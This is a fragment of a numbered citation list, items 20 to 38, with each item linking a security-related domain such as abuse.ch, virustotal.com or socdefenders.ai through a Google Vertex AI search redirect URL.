20. [socdefenders.ai](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHgxR-mNwhgVMjq8ysHGB8cRhYq4i1FddEcQR6ayFFp83uap536wMD23zl3rVaJoro6ZeYatSo7i_zVOzhtGZWCZlUpMsq3UhzqJ-EpQkBMW5klyogjdSbLGJPzNNL4dzG6nIrU-t6_Z5W1HA729SCf4269IMga-V6gsXPU86w=)
21. [socdefenders.ai](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFBWWd4kxTqCZzgMCsR7Dd7MKY0yRyPHYseHzAcAmaOyLImK7cjW3EcIScQX27ce8-t_mRK-mq5_i0cPj_N_tgjJ2EeSdoHuryfRMLAi4Pu8VF-ZfmZ67RP71bzPa8mXksMkhxdz2F7tslk0O0_KdGu6KPlPzfILx5fTffKS9I=)
22. [1275.ru](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFIPVCzGzFmprTBL8tTW243og790XJf0HJDauNvxh235pLxYszJMO-rGFtTWaDrbZhGXkl7CibMi_e10M0ZvS0B3WqvVIiM8bgzAbVI3Wbex3Fc1d0NNiUIF6kHO-vHdikxiQZqEBylmpEoo9aqN_q2kRlC00wWCDeC3Sp-TjCW8nplw6LyQ070wz8cMqs5gmM=)
23. [gitlab.io](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGD0nhtDkb80Tjyq_OWJzSdK74XtE8eDtTATyJUcp62G4y99PtHloJrJB4udfx6o1aLNsBl0oGPEviifDpHVUnAJmfdln7sOXfVXuOLs1uXyvh4G5wc1vB1k_a8t91k8kaXE_qEFyiNq4biEyy7ob9OdoJfXZuuy8wTGPut)
24. [abuse.ch](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQG3S2JFSO4o3fxf8ghdAbVKyDYB4nKzuzLinc6bCK6xKSv7sBvBMBYQzwsEh7tW2Scn1JaiBludqc-R1AoQCmB8PQz1RMvPTo5J3RryuxKPEVnBtZhihu9U0KDRok52l-s=)
25. [wyzguyscybersecurity.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHeyA93tzUioYCtaMmpg-n3joKyj78RiLULB3cebd4n1d3J35cAXesk4rfFTAyZazi7aMelzU0jKVxsNtFq1-tCtVwTErzU2CaQvqqtYLQLXXiqZTns87eIqEhIsS1pqoQV_wEY80Ivu5tTiYZytxnq_LT7OwEYIEXot_taBKiHPg8=)
26. [quickheal.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQG_1dc0lzH1F40IXmj4RL1ojKFH4ufAXeg0Qfo8URYySGAi2JMrGKopKFp8Oc2x70L_bxmX0zwUKGZOstOpxI0clke9WrLZv0sMGZYw55z2DFiZflg_HG-qpqdiLR5e1lKsis1ZU3TOK_G5teWrLC-MnatvF8rkXM6T9kqjeP1QnjJjL5gw8mCAGn7Gk2pA0biBKFJC5GhKuvJxD4hIyHh6YpM=)
27. [blackalps.ch](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQEMDc3fXlYW4VES96vmbtZgbUPk9VWjd-_jEmXOn8-bUgvSJ3RN_JCNuPu9OU6qtY5Yk6XXMRqKMBayXTi6GWS5wOvO1-nb5FwvFLwJ7ybRJQzgsEQqCMy4r462L-rYqw5VvXq-J5ILLFQPKSSy9ylRelyn67q5g5_M8wmQ4D_7ug==)
28. [abuse.ch](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGUll0bAwi4zU9Op1o8T7xN_wlYOPpoKQncPEHYZqGHci1hpS7pTig604-AubxVKOniF3Cdx4OYfouQ0Fq-9cfJYPD_bKARsEUv06_-oZANjgkCD8UPqyWaA4u7pm98oS7ZyHExBy1J-14sd1Dn8t1K5-WpeOGF1rUpa8XpID2bD2__mP59HNNDHiFMwowTOzxo_6L_CG8=)
29. [quickheal.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHhtv3PxYAKjsGOY7s38D3eNYQNOLC6HbCRbuz5d7ZkowZhdWEFN-NoCBARSemvZFnArjMDkUVjy7AhRjLaPnCj2C6lF8xZtXEe6IL65sh_ybGNqszuj4qT29n8B41CvT5At3rQTCvLdduxRls7Pa6IP9EC4xJnwN3Rd7S_juyNozliMBKquG2exPqLHqAE)
30. [lumen.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQF1hNh3Z1KC1sHst9HFV1nK6IBE0eZHEMnczFHksRiC00Rm9V4M2E1y4ZlCqQ_9WDAeEznrYVNan6Eb0rOtOtpqVJKEJPFHrxCUQge01EOXyF4XppxEV53QPgz_0KZeSyDlWKzOFwxFvbM=)
31. [virustotal.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQG2kbxwQRoB9i4YnGUs7gGuNVp2qyUDAmkq6UxjZ5x_1YtSZ3qvtnSpfzw33NIe8Sg-yAMK7rFZiS4Ud2qLilfjn64PGCqL9Rrgvkh3cnFmJxk8lZ2q4chyGmNlpwLA7_2Z68Se4g==)
32. [socdefenders.ai](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHjhbn8_lVktmPUxaqmAQrhLcwtP2NrFlId9IjJldw3nPbsZbZIpvF4BmXG138Jd81HRpV32C_Y26Bx1Kj9l_J8WUjStV8775FhiqPGt1wTJsaqnTizsUUDI6pwUajMizTVtTXTQd66UuDTThgGvU7EbGyt0kT4YoY2IAg5boc=)
33. [digital.nhs.uk](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFobzHvhotGEhih2rLEN3O97IpAlHoVMfVePScHj41c_Iz1apZ9wspNHW7OKSx7wmlZIGh3R8OaAoFt4_qFfWd8m9PAHjfgTajOK9YsE1fcW7Mj0AYX-aCOF6ICqEJcGMsUS00Gxak=)
34. [abuse.ch](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQEpMK1bOvNtw5A7ssC5I2fTyaigiX-tHJzCDc8oXttOC_fLURLp47rUDR4BFsemMH5gw9eBZO33xtGna7VG3Yks_pcMYA1zFYkDTXJmrm-UaU9id-WrQC6tkh6Rlbr3n3m7SnWfOaQyjSHXhPxg3X1scJbA)
35. [abuse.ch](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQEhYkI_EY2KipN-uUlLmfmBi0LywImRoIdSFgYj5HL4Up__2EWscEpUbweIRUXPcObxE5lYpxDqPU7Uvbzf9mZETcKRVqZ0QCKOzsTEmJrtdXe4iMWNOojKHL4VYrh0WGyBHk9ccMt3Yw69a2ZU_mUS-qW80PbCGpGsj8N6kNtKS8PkmFicFhyr8Pbpz3x8lyJ_00fFdrU=)
36. [virustotal.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFEi2uaAmd6xiDfTPP4Hr5_HcQORsNt4P6ZJr7_UPgNmFDEpbmWg9PzQh2hHS3kJwdMw7TM6lrnXUeRalnN3y5LLTkv-Cx-4dFdZuYfPSALPoYtl0tMOu0LOCUB5SFDjdW1UKB2F2LZZU7AZKBfuI0=)
37. [socdefenders.ai](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQH-LMUgUu8nZlmwEwDFlBnbGtFKwGItxwvZiy0Ryzge6ypV0-d7Bx9jKBiBMPLj-7W84l96EMgEVndv_s2kcYPLreYaSX52Sf1jLSN2jTIBzIBrD07hD1ohJ0zXUHEOhqBy8pIkZ0hnOFCnl2-QxG9cgPETsn7EVeWOr-5mgLE=)
38. [abuse.ch](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHDd2Jvrr9Rflt0umsNLnixEq3ac5t3_4dXQrC-a8YPvupfjXb-U1p-L8PJxKQ8NUOnDEOQNmSWhsPrLGc1oKEMeLdLji4F1L2o66bd55VdBRcRdw0wfLdMvURY4ycAb_vTNZU0)